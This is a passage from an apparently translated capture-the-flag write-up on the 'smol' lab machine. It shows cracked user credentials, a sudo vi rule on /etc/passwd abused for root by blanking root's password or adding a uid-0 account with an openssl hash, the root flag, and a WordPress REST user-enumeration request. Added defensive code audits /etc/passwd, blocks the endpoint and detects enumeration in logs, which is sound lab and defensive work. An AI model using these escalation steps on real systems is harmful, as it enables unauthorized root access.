define( 'SECURE_AUTH_KEY', 'put your unique phrase here' );
define( 'LOGGED_IN_KEY', 'put your unique phrase here' );
define( 'NONCE_KEY', 'put your unique phrase here' );
define( 'AUTH_SALT', 'put your unique phrase here' );
define( 'SECURE_AUTH_SALT', 'put your unique phrase here' );
define( 'LOGGED_IN_SALT', 'put your unique phrase here' );
define( 'NONCE_SALT', 'put your unique phrase here' );
/**#@-*/
/**
* WordPress database table prefix.
*
* You can have multiple installations in one database if you give each
* a unique prefix. Only numbers, letters, and underscores please!
*/
$table_prefix = 'wp_';
/**
* For developers: WordPress debugging mode.
*
* Change this to true to enable the display of notices during development.
* It is strongly recommended that plugin and theme developers use WP_DEBUG
* in their development environments.
*
* For information on other constants that can be used for debugging,
* visit the documentation.
*
* @link https://wordpress.org/documentation/article/debugging-in-wordpress/
*/
define( 'WP_DEBUG', true );
/* Add any custom values between this line and the "stop editing" line. */
/* That's all, stop editing! Happy publishing. */
/** Absolute path to the WordPress directory. */
if ( ! defined( 'ABSPATH' ) ) {
define( 'ABSPATH', __DIR__ . '/' );
}
/** Sets up WordPress vars and included files. */
require_once ABSPATH . 'wp-settings.php';
New credentials obtained:
xavi
P@ssw0rdxavi@
Switch to that user:
Editing /etc/passwd to get a root shell
xavi@smol:~$ sudo -l
[sudo] password for xavi:
Matching Defaults entries for xavi on smol:
env_reset, mail_badpass, secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin\:/snap/bin
User xavi may run the following commands on smol:
(ALL : ALL) /usr/bin/vi /etc/passwd
We can edit the /etc/passwd file, so either adding a high-privilege user with a crafted credential, or spawning a shell directly from vi's command mode, will work:
vi command mode
Adding a high-privilege user
Adding a root-level user is also a fine approach, and I suspect this is what the author intended to test; alternatively, blank out root's password field: root::0:0:root:/root:/usr/bin/bash :
┌──(kali💀kali)-[~/temp/Smol/wordpress.old]
└─$ openssl passwd -1 -salt kali kali
$1$kali$/rLA3oVIdYGokOY9m1jKj.
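As an added, defender-side example (not from the original write-up), this script checks /etc/passwd content for the two modifications discussed above: an emptied password field and an extra uid-0 account carrying an inline hash. The sample file is constructed; its `kali` entry reuses the openssl hash shown above, and on a real host the function would be fed the contents of /etc/passwd.

```python
"""Audit /etc/passwd content for the tampering demonstrated in this write-up."""

# Constructed sample /etc/passwd: a normal file plus the two modifications
# discussed above (root's password field emptied; an extra uid-0 account whose
# hash sits directly in /etc/passwd, reusing the openssl output shown above).
SAMPLE_PASSWD = """\
root::0:0:root:/root:/usr/bin/bash
daemon:x:1:1:daemon:/usr/sbin:/usr/sbin/nologin
think:x:1000:1000::/home/think:/bin/bash
xavi:x:1001:1001::/home/xavi:/bin/bash
kali:$1$kali$/rLA3oVIdYGokOY9m1jKj.:0:0:root:/root:/bin/bash
"""

# Values that mean "see /etc/shadow" or "locked"; anything else is a live hash
LOCKED_OR_SHADOWED = ("x", "*", "!", "!!")


def audit_passwd(text):
    """Return (account, reason) pairs for entries a clean /etc/passwd should not contain."""
    findings = []
    for lineno, raw in enumerate(text.splitlines(), 1):
        if not raw.strip() or raw.startswith("#"):
            continue
        fields = raw.split(":")
        if len(fields) != 7:
            findings.append((f"line {lineno}", f"malformed entry with {len(fields)} fields"))
            continue
        name, pw, uid, _gid, _gecos, _home, _shell = fields
        if pw == "":
            # 'root::0:0:...' as in the write-up: su/login succeeds with no password
            findings.append((name, "empty password field"))
        elif pw not in LOCKED_OR_SHADOWED and not pw.startswith("!"):
            # A hash here is honoured by PAM and is world-readable, unlike /etc/shadow
            findings.append((name, "password hash stored in /etc/passwd instead of /etc/shadow"))
        if uid == "0" and name != "root":
            findings.append((name, "additional uid 0 (root-equivalent) account"))
    return findings


if __name__ == "__main__":
    for account, reason in audit_passwd(SAMPLE_PASSWD):
        print(f"{account}: {reason}")
```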
root@smol:/home/xavi$ cd ~
root@smol:~$ ls -la
total 64K
drwx------ 7 root root 4.0K Jun 7 07:34 .
drwxr-xr-x 18 root root 4.0K Mar 29 2024 ..
lrwxrwxrwx 1 root root 9 Jun 2 2023 .bash_history -> /dev/null
-rw-r--r-- 1 root root 3.2K Jun 21 2023 .bashrc
drwx------ 2 root root 4.0K Jun 2 2023 .cache
-rw------- 1 root root 35 Mar 29 2024 .lesshst
drwxr-xr-x 3 root root 4.0K Jun 21 2023 .local
lrwxrwxrwx 1 root root 9 Aug 18 2023 .mysql_history -> /dev/null
drwxr-xr-x 4 root root 4.0K Aug 16 2023 .phpbrew
-rw-r--r-- 1 root root 161 Dec 5 2019 .profile
-rw-r----- 1 root root 33 Aug 16 2023 root.txt
-rw-r--r-- 1 root root 75 Aug 17 2023 .selected_editor
drwx------ 3 root root 4.0K Jun 21 2023 snap
drwx------ 2 root root 4.0K Jun 2 2023 .ssh
-rw-rw-rw- 1 root root 13K Jun 7 07:34 .viminfo
root@smol:~$ cat root.txt
bf89ea3ea01992353aef1f576214d4e4
Other attempts
I suddenly remembered that the group owner had mentioned a WordPress information disclosure:
┌──(kali💀kali)-[~/temp/Smol]
└─$ curl -s http://www.smol.hmv/index.php/wp-json/WP/V2/users/1 | jq
{
"id": 1,
"name": "admin",
"url": "http://www.smol.hmv",
"description": "",
"link": "http://www.smol.hmv/index.php/author/admin/",
"slug": "admin",
"avatar_urls": {
"24": "https://secure.gravatar.com/avatar/34704205919a3055db6e4930c4ea2180b94c3d103f12fa572b51c1a632676d33?s=24&d=monsterid&r=g",
"48": "https://secure.gravatar.com/avatar/34704205919a3055db6e4930c4ea2180b94c3d103f12fa572b51c1a632676d33?s=48&d=monsterid&r=g",
"96": "https://secure.gravatar.com/avatar/34704205919a3055db6e4930c4ea2180b94c3d103f12fa572b51c1a632676d33?s=96&d=monsterid&r=g"
},
"meta": [],
"_links": {
"self": [
{
"href": "http://www.smol.hmv/index.php/wp-json/wp/v2/users/1",
"targetHints": {
"allow": [
"GET"
]
}
}
],
"collection": [
{
"href": "http://www.smol.hmv/index.php/wp-json/wp/v2/users"
}
]
}
}
Web-server or firewall rules are needed to block this kind of disclosure.... For nginx, a case-insensitive rule that also covers the /index.php prefix used in the request above:
server {
    location ~* ^(/index\.php)?/wp-json/wp/v2/users(/.*)?$ {
        deny all;
        return 403;
    }
}
/**
 * Disable the WordPress user enumeration endpoints; only users with editor
 * privileges or above may access them.
 *
 * @author WPCOM
 * @version 1.0.0
 * @since 2024-12-26
 */
add_filter('rest_endpoints', function ($endpoints) {
    // Editors and above may see the user list. 'edit_others_posts' is a capability
    // held by editors and administrators; checking the role name 'editor' instead
    // would lock administrators out as well.
    if (current_user_can('edit_others_posts')) {
        return $endpoints;
    }
    // Remove the collection route and the per-user routes such as
    // /wp/v2/users/(?P<id>[\d]+) (the /wp-json/wp/v2/users/1 form requested above),
    // keeping /wp/v2/users/me so a logged-in user can still read their own record.
    foreach (array_keys($endpoints) as $route) {
        if (strpos($route, '/wp/v2/users') === 0 && $route !== '/wp/v2/users/me') {
            unset($endpoints[$route]);
        }
    }
    return $endpoints;
});
# functions.php
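As an added example (not from the original write-up), this script flags requests to the users REST route in Apache access logs. It matches the page's own request form (/index.php/wp-json/WP/V2/users/1, uppercase, which a case-sensitive ^/wp-json location would miss) as well as the ?rest_route= query form that no path-based rule catches and only the functions.php filter above stops. The log lines are constructed.

```python
"""Flag WordPress REST user-enumeration requests in Apache access logs."""
import re
from urllib.parse import parse_qs, unquote, urlsplit

# Constructed log lines in Apache combined format. The first mirrors the curl
# request above; the second is the ?rest_route= form that a path-only rule misses.
SAMPLE_LOG = """\
192.168.10.50 - - [07/Jun/2025:03:40:01 +0000] "GET /index.php/wp-json/WP/V2/users/1 HTTP/1.1" 200 812 "-" "curl/8.5.0"
192.168.10.50 - - [07/Jun/2025:03:40:05 +0000] "GET /?rest_route=/wp/v2/users HTTP/1.1" 200 1450 "-" "curl/8.5.0"
192.168.10.50 - - [07/Jun/2025:03:40:09 +0000] "GET /wp-json/wp/v2/posts?per_page=5 HTTP/1.1" 200 9023 "-" "Mozilla/5.0"
192.168.10.51 - - [07/Jun/2025:03:41:12 +0000] "GET /index.php/author/admin/ HTTP/1.1" 200 5120 "-" "Mozilla/5.0"
"""

LOG_RE = re.compile(r'^(\S+) \S+ \S+ \[([^\]]+)\] "(\S+) (\S+) [^"]*" (\d{3})')
USERS_ROUTE_RE = re.compile(r"/wp/v2/users(?:/|$)")


def is_user_enum_request(target):
    """True if the request target reaches the /wp/v2/users route in any spelling."""
    parts = urlsplit(target)
    path = unquote(parts.path).lower()
    # Pretty-permalink form, with or without an /index.php prefix, any letter case
    if "/wp-json" in path and USERS_ROUTE_RE.search(path):
        return True
    # Query form used when pretty permalinks are off; bypasses ^/wp-json path rules
    for route in parse_qs(parts.query).get("rest_route", []):
        if USERS_ROUTE_RE.search(unquote(route).lower()):
            return True
    return False


def find_user_enumeration(log_text):
    """Return (client_ip, method, target, status) for each flagged request."""
    hits = []
    for line in log_text.splitlines():
        m = LOG_RE.match(line)
        if not m:
            continue
        ip, _ts, method, target, status = m.groups()
        if is_user_enum_request(target):
            hits.append((ip, method, target, int(status)))
    return hits


if __name__ == "__main__":
    for ip, method, target, status in find_user_enumeration(SAMPLE_LOG):
        print(f"{ip} {method} {target} -> {status}")
```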